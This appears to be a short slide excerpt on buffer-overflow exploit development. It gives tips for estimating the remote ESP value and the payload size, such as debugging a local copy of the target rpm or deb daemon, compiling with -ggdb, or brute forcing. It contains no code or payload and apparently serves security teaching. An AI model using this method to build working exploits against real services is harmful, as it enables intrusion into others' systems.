•Usually
unable to determine ESP on the remote system
–Educated guess by compiling/testing
remotely
–If daemon is a part of a binary package (rpm
or deb, for example)
debug your own copy of the daemon first
–Brute force it (ugly and noisy)
•If
you have the source code, compile it yourself (with the -ggdb option set for better debugging)
–Try to compile it with the same options as
an rpm or deb you wish to exploit, that way you can get all the values such as ESP and the proper size of
the payload correct
–Test with an rpm or deb package, until you get
it right